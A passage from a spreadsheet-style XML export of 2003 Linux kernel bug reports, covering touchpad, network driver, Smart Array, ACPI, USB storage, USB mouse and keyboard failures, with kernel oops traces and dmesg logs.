myself. [1] http://forums.gentoo.org/viewtopic.php?t=67852 I'd be very grateful if this could be incorporated into the kernel and automated for ease and convenience. If you require any further information or wish to discuss this further please let me know. Also, below are certain error messages about synaptics found in dmesg. $ dmesg | grep synaptics synaptics reset failed synaptics reset failed synaptics reset failed I will also attach the entire output of dmesg for reference. Many thanks.</t>
  </si>
  <si>
    <t>Neither Touchpad nor Pointer work on a Laptop with a Touchpat and a Pointer</t>
  </si>
  <si>
    <t>2003-08-10 10:38 UTC</t>
  </si>
  <si>
    <t>Paul Bender</t>
  </si>
  <si>
    <t>2004-02-02 00:14 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat Rawhide 20030810 Hardware Environment: Compaq Evo N600c Software Environment: Problem Description: I am using the 2.6.0-test3 kernel rpm: http://people.redhat.com/arjanv/2.5/RPMS.kernel/kernel-2.6.0-0.test3.1.31.i686.rpm. The Compaq Evo N600c has both a Synaptics touchpad and a pointer. However, neither of them work. In /proc/bus/input/devices, the touchpad and keyboard show up, but the pointer does not. This may be the same as or related two #149 or #1002. However, #149 does not indicate whether or not the touchpad does not work, and #1002 does not mention a pointer. As a result, I have filed a new bug report. Steps to reproduce: Boot computer.</t>
  </si>
  <si>
    <t>pmac ide driver doesn't compile</t>
  </si>
  <si>
    <t>2003-08-11 03:31 UTC</t>
  </si>
  <si>
    <t>Francesco Sportolari</t>
  </si>
  <si>
    <t>2003-08-12 04:37 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable Hardware Environment: iBook 2 (dual USB) 500Mhz Problem Description: The pmac IDE driver (drivers/ide/ppc/pmac.c) doesn't compile due to a change in ide_drive_s struct.</t>
  </si>
  <si>
    <t>2005-02-17 11:59 UTC</t>
  </si>
  <si>
    <t>Jaroslav Kysela</t>
  </si>
  <si>
    <t>(net e100) driver causes dhcp to fail</t>
  </si>
  <si>
    <t>2.6.0 test3</t>
  </si>
  <si>
    <t>2003-08-11 08:59 UTC</t>
  </si>
  <si>
    <t>Peter Buelow</t>
  </si>
  <si>
    <t>Distribution: Slackware Hardware Environment: HPx4000 dual proc, 1GB Ram, Scsi subsytem, no hardware changes from default. Software Environment: slightly modified slack distro Problem Description: Build the intel e100 driver into the test3 kernel and boot the system. ISC dhcp version DHCP Client Daemon v.1.3.22-pl4 fails to initialize the interface or obtain a lease. The original e100 driver works without issue with the same configuration. This has not been tested with modules. I am also unsure as to whether this would happen with a newer version of the dhcp client. Steps to reproduce: Build the Intel e100 driver into the kernel and attempt to obtain a dhcp lease with the 1.3.22 version of dhcpcd.</t>
  </si>
  <si>
    <t>Kernel panic while initializing HP Smart Array (cciss)</t>
  </si>
  <si>
    <t>2003-08-11 12:55 UTC</t>
  </si>
  <si>
    <t>Hugo Souza</t>
  </si>
  <si>
    <t>2005-07-05 12:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat 7.3 Hardware Environment: HP DL380 G3, dual P4 2.4Ghz (hyperthreading), 512Mb, 2 x 36G discs in RAID 1, HP Smart Array 5i (v. 2.36) Software Environment: No external packages, just using RH 7.3 .rpm. GCC version 2.96 (rpm release 110) Problem Description: During the boot process, the kernel will panic just after it initializes the "Compaq CISS Drive (v.2.5.0)": Unable to handle kernel NULL pointer dereference at virtual address 0000019a printing eip: c0216249 *pde = 00000000 Oops: 0002 [#1] CPU: 0 EIP: 0060:[&lt;c0216249&gt;] Not tainted EFLAGS: 00010202 EIP is at blk_queue_hardsect_size+0x9/0x20 eax: 00000020 ebx: df79e050 ecx: 00000000 edx: 00000000 esi: 00000000 edi: df7b0002 ebp: 00000000 esp: dff7bee8 ds: 007b es: 007b ss: 0068 Process swapper (pid:1, threadinfo=dff7a000 task=c1527000) Stack: (lots of hexas) Call: Trace: [&lt;c0387944&gt;] cciss_init_one+0x4d4/0x510 [&lt;c018b40c&gt;] sysfs_create+0x5c/0x80 [&lt;c01f6dcc&gt;] pci_device_probe_static+0x2c/0x50 (..) &lt;0&gt;Kernel panic: Attempted to kill init! I have the whole message as a screenshot, which i can send to anyone interested. Steps to reproduce: Compile the kernel with Compaq Smart Array 5xxx suport and boot. Using the same .config file i was able to compile a 2.6.0-test2 which worked fine.</t>
  </si>
  <si>
    <t>S845WD1-E boot panic unless acpi=off</t>
  </si>
  <si>
    <t>Config-Tables</t>
  </si>
  <si>
    <t>2.4.22</t>
  </si>
  <si>
    <t>2003-08-11 13:00 UTC</t>
  </si>
  <si>
    <t>Samuel Flory</t>
  </si>
  <si>
    <t>2004-03-03 21:55 UTC</t>
  </si>
  <si>
    <t>Distribution:RH 7.3 Hardware Environment: Intel S845WD1-E Software Environment: 2.4.22-pre10 Problem Description: The system oops with the following oops: ksymoops 2.4.4 on i686 2.4.20-8smp. Options used -V (default) -K (specified) -L (specified) -O (specified) -m /boot/System.map-2.4.22-pre10 (specified) ACPI: LAPIC_NMI (acpi_id[0x01] polarity[0x0] trigger[0x0] lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x02] polarity[0x0] trigger[0x0] lint[0x1]) cpu: 0, clocks: 1328876, slice: 664438 Unable to handle kernel paging request at virtual address f8803000 c022d588 *pde = 00000000 Oops: 0000 CPU: 0 EIP: 0010:[&lt;c022d588&gt;] Not tainted Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00010206 eax: 00000000 ebx: 00000000 ecx: 00000001 edx: c1c13ec0 esi: f8802ffd edi: c1c13ee0 ebp: c1c13ec0 esp: c1c13e64 ds: 0018 es: 0018 ss: 0018 Process swapper (pid: 1, stackpage=c1c13000) Stack: c1c13f1c c1c13f1c c1c13e84 c022d015 c1c13ec0 f8802fdd 00000024 f8802fdd 00000008 c0492d37 c0492d24 00200000 c1c13eb0 c1c13ec0 c1c13f2c c1c13eb0 c022c984 c1c13f1c c1c13ec0 00000008 c0492cab c0492ca2 c1c13f0c 54445353 Call Trace: [&lt;c022d015&gt;] [&lt;c022c984&gt;] [&lt;c022cb68&gt;] [&lt;c022cd89&gt;] [&lt;c022e124&gt;] [&lt;c022e1fa&gt;] [&lt;c0105000&gt;] [&lt;c010508b&gt;] [&lt;c0105000&gt;] [&lt;c01075ae&gt;] [&lt;c0105060&gt;] Code: f3 a5 e9 5c ff ff ff c1 e9 02 89 d7 f3 a5 a4 e9 4f ff ff ff &gt;&gt;EIP; c022d588 &lt;__constant_memcpy+bd/f5&gt; &lt;===== Trace; c022d015 &lt;acpi_tb_get_table_header+11a/12d&gt; Trace; c022c984 &lt;acpi_tb_get_primary_table+64/d2&gt; Trace; c022cb68 &lt;acpi_tb_get_required_tables+45/2b4&gt; Trace; c022cd89 &lt;acpi_tb_get_required_tables+266/2b4&gt; Trace; c022e124 &lt;acpi_load_tables+34/188&gt; Trace; c022e1fa &lt;acpi_load_tables+10a/188&gt; Trace; c0105000 &lt;_stext+0/0&gt; Trace; c010508b &lt;init+2b/190&gt; Trace; c0105000 &lt;_stext+0/0&gt; Trace; c01075ae &lt;arch_kernel_thread+2e/40&gt; Trace; c0105060 &lt;init+0/190&gt; Code; c022d588 &lt;__constant_memcpy+bd/f5&gt; 00000000 &lt;_EIP&gt;: Code; c022d588 &lt;__constant_memcpy+bd/f5&gt; &lt;===== 0: f3 a5 repz movsl %ds:(%esi),%es:(%edi) &lt;===== Code; c022d58a &lt;__constant_memcpy+bf/f5&gt; 2: e9 5c ff ff ff jmp ffffff63 &lt;_EIP+0xffffff63&gt; Code; c022d58f &lt;__constant_memcpy+c4/f5&gt; 7: c1 e9 02 shr $0x2,%ecx Code; c022d592 &lt;__constant_memcpy+c7/f5&gt; a: 89 d7 mov %edx,%edi Code; c022d594 &lt;__constant_memcpy+c9/f5&gt; c: f3 a5 repz movsl %ds:(%esi),%es:(%edi) Code; c022d596 &lt;__constant_memcpy+cb/f5&gt; e: a4 movsb %ds:(%esi),%es:(%edi) Code; c022d597 &lt;__constant_memcpy+cc/f5&gt; f: e9 4f ff ff ff jmp ffffff63 &lt;_EIP+0xffffff63&gt; -- Once you have their hardware. Never give it back. (The First Rule of Hardware Acquisition) Sam Flory &lt;sflory@rackable.com&gt; TrLinux version 2.4.22-pre10 (root@grendel) (gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)) #2 SMP Fri Aug 1 07:39:59 PDT 2003 BIOS-provided physical RAM map:ntel Corporation BIOS-e820: 0000000000000000 - 000000000009b400 (usable) BIOS-e820: 000000000009b400 - 000000000009b800 (reserved) BIOS-e820: 00000000000e8000 - 0000000000100000 (reserved) . Peter Anvin BIOS-e820: 0000000000100000 - 000000003ffc0000 (usable) BIOS-e820: 000000003ffc0000 - 000000003fff8000 (ACPI data) BIOS-e820: 000000003fff8000 - 0000000040000000 (ACPI NVS) BIOS-e820: 00000000fec00000 - 00000000fec01000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) BIOS-e820: 00000000ffb80000 - 00000000ffc00000 (reserved) BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) 127MB HIGHMEM available.re # is 71, 72, 73, 80 or 90) 896MB LOWMEM available.all Red Hat 7.1-8.0 full auto /w lilo found SMP MP-table at 000ff780 is 71, 72, 73, or 80) hm, page 000ff000 reserved twice.Hat 7.1-9.0 semi auto hm, page 00100000 reserved twice.is 71, 72, 73, 80 or 90) hm, page 000f1000 reserved twice.hard drive hm, page 000f2000 reserved twice. On node 0 totalpages: 262080ng /vmlinuz-2.4.22-pre10.............. zone(0): 4096 pages. zone(1): 225280 pages. zone(2): 32704 pages. ACPI: RSDP (v000 AMI ) @ 0x000ff980 ACPI: RSDT (v001 D845WD WD84510A 08194.04632) @ 0x3fff0000 ACPI: FADT (v001 D845WD WD84510A 08194.04632) @ 0x3fff1000 ACPI: MADT (v001 D845WD WD84510A 08194.04632) @ 0x3ffe2f75 ACPI: SSDT (v001 D845WD WD84510A 00000.00001) @ 0x3ffe2fdd ACPI: DSDT (v001 D845WD WD84510A 00000.00001) @ 0x00000000 ACPI: BIOS passes blacklist ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled) Processor #0 Pentium 4(tm) XEON(tm) APIC version 16 ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] disabled) ACPI: LAPIC_NMI (acpi_id[0x01] polarity[0x0] trigger[0x0] lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x02] polarity[0x0] trigger[0x0] lint[0x1]) ACPI: IOAPIC (id[0x02] address[0xfec00000] global_irq_base[0x0]) IOAPIC[0]: Assigned apic_id 2 IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, IRQ 0-23 ACPI: INT_SRC_OVR (bus[0] irq[0x9] global_irq[0x9] polarity[0x1] trigger[0x3]) ACPI: INT_SRC_OVR (bus[0] irq[0x0] global_irq[0x2] polarity[0x0] trigger[0x0]) Using ACPI (MADT) for SMP configuration information Kernel command line: root=/dev/nfs ip=::::::dhcp nfsroot=10.10.1.3:/vol0/nfs/root/current console=ttyS1,9600 console=tty0 BOOT_IMAGE=/vmlinuz-2.4.22-pre10 Initializing CPU#0 Detected 2392.081 MHz processor. Console: colour VGA+ 80x25 Calibrating delay loop... 4771.02 BogoMIPS Memory: 1030008k/1048320k available (3314k kernel code, 17908k reserved, 1171k data, 380k init, 130816k highmem) Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) Inode cache hash table entries: 65536 (order: 7, 524288 bytes) Mount cache hash table entries: 512 (order: 0, 4096 bytes) Buffer cache hash table entries: 65536 (order: 6, 262144 bytes) Page-cache hash table entries: 262144 (order: 8, 1048576 bytes) CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Hyper-Threading is disabled Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. POSIX conformance testing by UNIFIX mtrr: v1.40 (20010327) Richard Gooch (rgooch@atnf.csiro.au) mtrr: detected mtrr type: Intel CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Hyper-Threading is disabled Intel machine check reporting enabled on CPU#0. CPU0: Intel(R) Pentium(R) 4 CPU 2.40GHz stepping 07 per-CPU timeslice cutoff: 1462.89 usecs. enabled ExtINT on CPU#0 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Error: only one processor found. ENABLING IO-APIC IRQs ..TIMER: vector=0x31 pin1=2 pin2=0 testing the IO APIC....................... .................................... done. Using local APIC timer interrupts. calibrating APIC timer ... ..... CPU clock speed is 2391.9812 MHz. ..... host bus clock speed is 132.8876 MHz. cpu: 0, clocks: 1328876, slice: 664438 CPU0&lt;T0:1328864,T1:664416,D:10,S:664438,C:1328876&gt; Waiting on wait_init_idle (map = 0x0) All processors have done init_idle ACPI: Subsystem revision 20030619 PCI: PCI BIOS revision 2.10 entry at 0xfda95, last bus=2 PCI: Using configuration type 1 Unable to handle kernel paging request at virtual address f8803000 printing eip: c022d588 *pde = 00000000 Oops: 0000 CPU: 0 EIP: 0010:[&lt;c022d588&gt;] Not tainted EFLAGS: 00010206 eax: 00000000 ebx: 00000000 ecx: 00000001 edx: c1c13ec0 esi: f8802ffd edi: c1c13ee0 ebp: c1c13ec0 esp: c1c13e64 ds: 0018 es: 0018 ss: 0018 Process swapper (pid: 1, stackpage=c1c13000) Stack: c1c13f1c c1c13f1c c1c13e84 c022d015 c1c13ec0 f8802fdd 00000024 f8802fdd 00000008 c0492d37 c0492d24 00200000 c1c13eb0 c1c13ec0 c1c13f2c c1c13eb0 c022c984 c1c13f1c c1c13ec0 00000008 c0492cab c0492ca2 c1c13f0c 54445353 Call Trace: [&lt;c022d015&gt;] [&lt;c022c984&gt;] [&lt;c022cb68&gt;] [&lt;c022cd89&gt;] [&lt;c022e124&gt;] [&lt;c022e1fa&gt;] [&lt;c0105000&gt;] [&lt;c010508b&gt;] [&lt;c0105000&gt;] [&lt;c01075ae&gt;] [&lt;c0105060&gt;] Code: f3 a5 e9 5c ff ff ff c1 e9 02 89 d7 f3 a5 a4 e9 4f ff ff ff &lt;0&gt;Kernel panic: Attempted to kill init!</t>
  </si>
  <si>
    <t>Larry Finger</t>
  </si>
  <si>
    <t>serio.o fails to compile</t>
  </si>
  <si>
    <t>2003-08-12 16:54 UTC</t>
  </si>
  <si>
    <t>alberto</t>
  </si>
  <si>
    <t>2003-08-31 17:43 UTC</t>
  </si>
  <si>
    <t>Unplugging USB MP3 player from causes these printouts. May be related to scsi subsytem.</t>
  </si>
  <si>
    <t>2.6.0-test3 and all the previous too</t>
  </si>
  <si>
    <t>2003-08-13 06:15 UTC</t>
  </si>
  <si>
    <t>Maciej Soltysiak</t>
  </si>
  <si>
    <t>Distribution: Debian SID Hardware Environment: UHCI Intel Corp. 82801BA/BAM USB (Hub #2) (rev 12) Software Environment: mount-2.11z, gcc-3.3.1, (on gcc-3.2.2 too) Problem Description: After unplugging an USB MP3 player that uses scsi_mod, sd_mod and usb-storage, the kernel prints out these: I reported this as early as 2.5.69. Steps to reproduce: compile the kernel with scsi_mod, sd_mod, usb-storage (all needed to transfer files to the usb device). Plug in the device. You can mount it, copy files, whatever. Here's what you get about: class_dev_release at drivers/base/class.c:201 and kobject_cleanup at lib/kobject.c:402 ### hub 1-0:0: port 2, status 100, change 3, 12 Mb/s usb 1-2: USB disconnect, address 3 drivers/usb/core/message.c: nuking URBs for device 1-2 usb 1-2: unregistering interfaces usb-storage: storage_disconnect() called usb-storage: usb_stor_stop_transport called usb-storage: -- dissociate_dev Device class '1:0:0:0' does not have a release() function, it is broken and must be fixed. Badness in class_dev_release at drivers/base/class.c:201 Call Trace: [kobject_cleanup+131/133] kobject_cleanup+0x83/0x85 [class_device_unregister+19/35] class_device_unregister+0x13/0x23 [scsi_device_unregister+31/47] scsi_device_unregister+0x1f/0x2f [scsi_remove_device+15/21] scsi_remove_device+0xf/0x15 [scsi_forget_host+25/39] scsi_forget_host+0x19/0x27 [scsi_remove_host+55/70] scsi_remove_host+0x37/0x46 [storage_disconnect+138/187] storage_disconnect+0x8a/0xbb [usb_unbind_interface+117/119] usb_unbind_interface+0x75/0x77 [device_release_driver+98/100] device_release_driver+0x62/0x64 [bus_remove_device+94/165] bus_remove_device+0x5e/0xa5 [device_del+93/147] device_del+0x5d/0x93 [device_unregister+19/35] device_unregister+0x13/0x23 [usb_disconnect+293/367] usb_disconnect+0x125/0x16f [hub_port_connect_change+914/919] hub_port_connect_change+0x392/0x397 [hub_events+948/1148] hub_events+0x3b4/0x47c [hub_thread+42/214] hub_thread+0x2a/0xd6 [default_wake_function+0/46] default_wake_function+0x0/0x2e [hub_thread+0/214] hub_thread+0x0/0xd6 [kernel_thread_helper+5/11] kernel_thread_helper+0x5/0xb kobject 'sda1' does not have a release() function, it is broken and must be fixed. Badness in kobject_cleanup at lib/kobject.c:402 Call Trace: [kobject_cleanup+95/133] kobject_cleanup+0x5f/0x85 [delete_partition+109/144] delete_partition+0x6d/0x90 [del_gendisk+47/200] del_gendisk+0x2f/0xc8 [sd_remove+32/112] sd_remove+0x20/0x70 [device_release_driver+98/100] device_release_driver+0x62/0x64 [bus_remove_device+94/165] bus_remove_device+0x5e/0xa5 [device_del+93/147] device_del+0x5d/0x93 [device_unregister+19/35] device_unregister+0x13/0x23 [scsi_remove_device+15/21] scsi_remove_device+0xf/0x15 [scsi_forget_host+25/39] scsi_forget_host+0x19/0x27 [scsi_remove_host+55/70] scsi_remove_host+0x37/0x46 [storage_disconnect+138/187] storage_disconnect+0x8a/0xbb [usb_unbind_interface+117/119] usb_unbind_interface+0x75/0x77 [device_release_driver+98/100] device_release_driver+0x62/0x64 [bus_remove_device+94/165] bus_remove_device+0x5e/0xa5 [device_del+93/147] device_del+0x5d/0x93 [device_unregister+19/35] device_unregister+0x13/0x23 [usb_disconnect+293/367] usb_disconnect+0x125/0x16f [hub_port_connect_change+914/919] hub_port_connect_change+0x392/0x397 [hub_events+948/1148] hub_events+0x3b4/0x47c [hub_thread+42/214] hub_thread+0x2a/0xd6 [default_wake_function+0/46] default_wake_function+0x0/0x2e [hub_thread+0/214] hub_thread+0x0/0xd6 [kernel_thread_helper+5/11] kernel_thread_helper+0x5/0xb kobject 'iosched' does not have a release() function, it is broken and must be fixed. Badness in kobject_cleanup at lib/kobject.c:402 Call Trace: [kobject_cleanup+95/133] kobject_cleanup+0x5f/0x85 [elv_unregister_queue+26/56] elv_unregister_queue+0x1a/0x38 [blk_unregister_queue+30/79] blk_unregister_queue+0x1e/0x4f [unlink_gendisk+33/136] unlink_gendisk+0x21/0x88 [del_gendisk+92/200] del_gendisk+0x5c/0xc8 [sd_remove+32/112] sd_remove+0x20/0x70 [device_release_driver+98/100] device_release_driver+0x62/0x64 [bus_remove_device+94/165] bus_remove_device+0x5e/0xa5 [device_del+93/147] device_del+0x5d/0x93 [device_unregister+19/35] device_unregister+0x13/0x23 [scsi_remove_device+15/21] scsi_remove_device+0xf/0x15 [scsi_forget_host+25/39] scsi_forget_host+0x19/0x27 [scsi_remove_host+55/70] scsi_remove_host+0x37/0x46 [storage_disconnect+138/187] storage_disconnect+0x8a/0xbb [usb_unbind_interface+117/119] usb_unbind_interface+0x75/0x77 [device_release_driver+98/100] device_release_driver+0x62/0x64 [bus_remove_device+94/165] bus_remove_device+0x5e/0xa5 [device_del+93/147] device_del+0x5d/0x93 [device_unregister+19/35] device_unregister+0x13/0x23 [usb_disconnect+293/367] usb_disconnect+0x125/0x16f [hub_port_connect_change+914/919] hub_port_connect_change+0x392/0x397 [hub_events+948/1148] hub_events+0x3b4/0x47c [hub_thread+42/214] hub_thread+0x2a/0xd6 [default_wake_function+0/46] default_wake_function+0x0/0x2e [hub_thread+0/214] hub_thread+0x0/0xd6 [kernel_thread_helper+5/11] kernel_thread_helper+0x5/0xb kobject 'queue' does not have a release() function, it is broken and must be fixed. Badness in kobject_cleanup at lib/kobject.c:402 Call Trace: [kobject_cleanup+95/133] kobject_cleanup+0x5f/0x85 [blk_unregister_queue+44/79] blk_unregister_queue+0x2c/0x4f [unlink_gendisk+33/136] unlink_gendisk+0x21/0x88 [del_gendisk+92/200] del_gendisk+0x5c/0xc8 [sd_remove+32/112] sd_remove+0x20/0x70 [device_release_driver+98/100] device_release_driver+0x62/0x64 [bus_remove_device+94/165] bus_remove_device+0x5e/0xa5 [device_del+93/147] device_del+0x5d/0x93 [device_unregister+19/35] device_unregister+0x13/0x23 [scsi_remove_device+15/21] scsi_remove_device+0xf/0x15 [scsi_forget_host+25/39] scsi_forget_host+0x19/0x27 [scsi_remove_host+55/70] scsi_remove_host+0x37/0x46 [storage_disconnect+138/187] storage_disconnect+0x8a/0xbb [usb_unbind_interface+117/119] usb_unbind_interface+0x75/0x77 [device_release_driver+98/100] device_release_driver+0x62/0x64 [bus_remove_device+94/165] bus_remove_device+0x5e/0xa5 [device_del+93/147] device_del+0x5d/0x93 [device_unregister+19/35] device_unregister+0x13/0x23 [usb_disconnect+293/367] usb_disconnect+0x125/0x16f [hub_port_connect_change+914/919] hub_port_connect_change+0x392/0x397 [hub_events+948/1148] hub_events+0x3b4/0x47c [hub_thread+42/214] hub_thread+0x2a/0xd6 [default_wake_function+0/46] default_wake_function+0x0/0x2e [hub_thread+0/214] hub_thread+0x0/0xd6 [kernel_thread_helper+5/11] kernel_thread_helper+0x5/0xb Device class 'host1' does not have a release() function, it is broken and must be fixed. Badness in class_dev_release at drivers/base/class.c:201 Call Trace: [kobject_cleanup+131/133] kobject_cleanup+0x83/0x85 [device_del+104/147] device_del+0x68/0x93 [scsi_host_put+31/47] scsi_host_put+0x1f/0x2f [usb_stor_release_resources+249/254] usb_stor_release_resources+0xf9/0xfe [usb_unbind_interface+117/119] usb_unbind_interface+0x75/0x77 [device_release_driver+98/100] device_release_driver+0x62/0x64 [bus_remove_device+94/165] bus_remove_device+0x5e/0xa5 [device_del+93/147] device_del+0x5d/0x93 [device_unregister+19/35] device_unregister+0x13/0x23 [usb_disconnect+293/367] usb_disconnect+0x125/0x16f [hub_port_connect_change+914/919] hub_port_connect_change+0x392/0x397 [hub_events+948/1148] hub_events+0x3b4/0x47c [hub_thread+42/214] hub_thread+0x2a/0xd6 [default_wake_function+0/46] default_wake_function+0x0/0x2e [hub_thread+0/214] hub_thread+0x0/0xd6 [kernel_thread_helper+5/11] kernel_thread_helper+0x5/0xb</t>
  </si>
  <si>
    <t>USB Mouse stops working, need to rmmod/modprobe hid to get it back</t>
  </si>
  <si>
    <t>2003-08-13 08:21 UTC</t>
  </si>
  <si>
    <t>David Hollis</t>
  </si>
  <si>
    <t>2003-10-06 20:54 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat Linux 9 Hardware Environment: Compaq Evo N610c Software Environment: Problem Description: I use a Microsoft USB mouse with my laptop which had no problems at all with 2.4 all through 2.6.0-test2-mm2. As of 2.6.0-test2-mm4, the mouse freezes and I have remove the hid driver and reload it to get it back. It may work for 2 minutes, 20 minutes, maybe a bit longer (but not much), and it will freeze again. I have to constantly remove hid and reload it. Here is dmesg output after a lockup: drivers/usb/core/usb.c: deregistering driver hiddev drivers/usb/core/usb.c: deregistering driver hid ohci-hcd 0000:02:0e.0: shutdown urb efb54b00 pipe 40408380 ep1in-intr usb 1-2: hcd_unlink_urb efb54b00 fail -22 usb 1-2: hcd_unlink_urb efb54980 fail -22 usb 1-2: hcd_unlink_urb efb54b00 fail -22 drivers/usb/core/usb.c: registered new driver hiddev hid 1-2:0: usb_probe_interface hid 1-2:0: usb_probe_interface - got id input: USB HID v1.00 Mouse [Microsoft Microsoft 3-Button Mouse with IntelliEye?] on usb-0000:02:0e.0-2 drivers/usb/core/usb.c: registered new driver hid drivers/usb/input/hid-core.c: v2.0:USB HID core driver Steps to reproduce: Build 2.6.0-test3-mm2, use the USB mouse as normal.</t>
  </si>
  <si>
    <t>File map error</t>
  </si>
  <si>
    <t>2.6.0-test3-mm2</t>
  </si>
  <si>
    <t>2003-08-13 11:41 UTC</t>
  </si>
  <si>
    <t>2003-08-13 12:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux 1.4 Hardware Environment: vt82cxxx IDE Controller Software Environment: ext3 e2fsprogs version: 1.33 Problem Description: When you start the kernel fsck.ext3 crashes due to an error in filesystem and gives me a kernel panic. Steps to reproduce: Just run the new kernel</t>
  </si>
  <si>
    <t>Keyboard does not work at all (laptop)</t>
  </si>
  <si>
    <t>2003-08-14 07:31 UTC</t>
  </si>
  <si>
    <t>Thomas G</t>
  </si>
  <si>
    <t>2004-02-11 00:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 9.1 Hardware Environment: Laptop (Tekneo) XP 1800+ 256Mb DDR VIA Chipset (+sound +graphics) Software Environment: kernel Problem Description: The keyboard and the synaptics touchpad do not work at all Here are the related kernel log lines : (debug options activated in i8042.c and in atkbd.c) drivers/input/serio/i8042.c: 25 &lt;- i8042 (flush, kbd) [0] drivers/input/serio/i8042.c: 20 -&gt; i8042 (command) [0] drivers/input/serio/i8042.c: 67 &lt;- i8042 (return) [0] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [0] drivers/input/serio/i8042.c: 76 -&gt; i8042 (parameter) [0] drivers/input/serio/i8042.c: d3 -&gt; i8042 (command) [1] drivers/input/serio/i8042.c: f0 -&gt; i8042 (parameter) [1] drivers/input/serio/i8042.c: 0f &lt;- i8042 (return) [1] drivers/input/serio/i8042.c: d3 -&gt; i8042 (command) [2] drivers/input/serio/i8042.c: 56 -&gt; i8042 (parameter) [2] drivers/input/serio/i8042.c: a9 &lt;- i8042 (return) [2] drivers/input/serio/i8042.c: d3 -&gt; i8042 (command) [3] drivers/input/serio/i8042.c: a4 -&gt; i8042 (parameter) [3] drivers/input/serio/i8042.c: ee &lt;- i8042 (return) [3] i8042.c: Detected active multiplexing controller, rev 1.1. drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [4] drivers/input/serio/i8042.c: 20 -&gt; i8042 (parameter) [4] drivers/input/serio/i8042.c: 90 -&gt; i8042 (command) [4] drivers/input/serio/i8042.c: a8 -&gt; i8042 (command) [5] drivers/input/serio/i8042.c: 91 -&gt; i8042 (command) [5] drivers/input/serio/i8042.c: a8 -&gt; i8042 (command) [5] drivers/input/serio/i8042.c: 92 -&gt; i8042 (command) [6] drivers/input/serio/i8042.c: a8 -&gt; i8042 (command) [6] drivers/input/serio/i8042.c: 93 -&gt; i8042 (command) [6] drivers/input/serio/i8042.c: a8 -&gt; i8042 (command) [7] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [7] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [7] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [8] drivers/input/serio/i8042.c: 02 -&gt; i8042 (parameter) [8] atkbd.c: Sent: f2 drivers/input/serio/i8042.c: 90 -&gt; i8042 (command) [8] drivers/input/serio/i8042.c: f2 -&gt; i8042 (parameter) [8] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, aux0, 12) [10] atkbd.c: Received fe flags 00 atkbd.c: Sent: ed drivers/input/serio/i8042.c: 90 -&gt; i8042 (command) [10] drivers/input/serio/i8042.c: ed -&gt; i8042 (parameter) [10] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, aux0, 12) [11] atkbd.c: Received fe flags 00 drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [11] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [11] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [11] drivers/input/serio/i8042.c: 02 -&gt; i8042 (parameter) [11] drivers/input/serio/i8042.c: 90 -&gt; i8042 (command) [12] drivers/input/serio/i8042.c: f2 -&gt; i8042 (parameter) [12] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, aux0, 12) [13] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [13] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [13] serio: i8042 AUX0 port at 0x60,0x64 irq 12 drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [14] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [14] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [14] drivers/input/serio/i8042.c: 02 -&gt; i8042 (parameter) [14] atkbd.c: Sent: f2 drivers/input/serio/i8042.c: 91 -&gt; i8042 (command) [15] drivers/input/serio/i8042.c: f2 -&gt; i8042 (parameter) [15] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, aux1, 12) [16] atkbd.c: Received fe flags 00 atkbd.c: Sent: ed drivers/input/serio/i8042.c: 91 -&gt; i8042 (command) [16] drivers/input/serio/i8042.c: ed -&gt; i8042 (parameter) [16] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, aux1, 12) [17] atkbd.c: Received fe flags 00 drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [17] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [17] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [18] drivers/input/serio/i8042.c: 02 -&gt; i8042 (parameter) [18] drivers/input/serio/i8042.c: 91 -&gt; i8042 (command) [18] drivers/input/serio/i8042.c: f2 -&gt; i8042 (parameter) [18] drivers/input/serio/i8042.c: fe &lt;- i8042 (interrupt, aux1, 12) [20] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [20] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [20] serio: i8042 AUX1 port at 0x60,0x64 irq 12 drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [20] drivers/input/serio/i8042.c: 00 -&gt; i8042 (parameter) [20] drivers/input/serio/i8042.c: 60 -&gt; i8042 (command) [21] drivers/input/serio/i8042.c: 02 -&gt; i8042 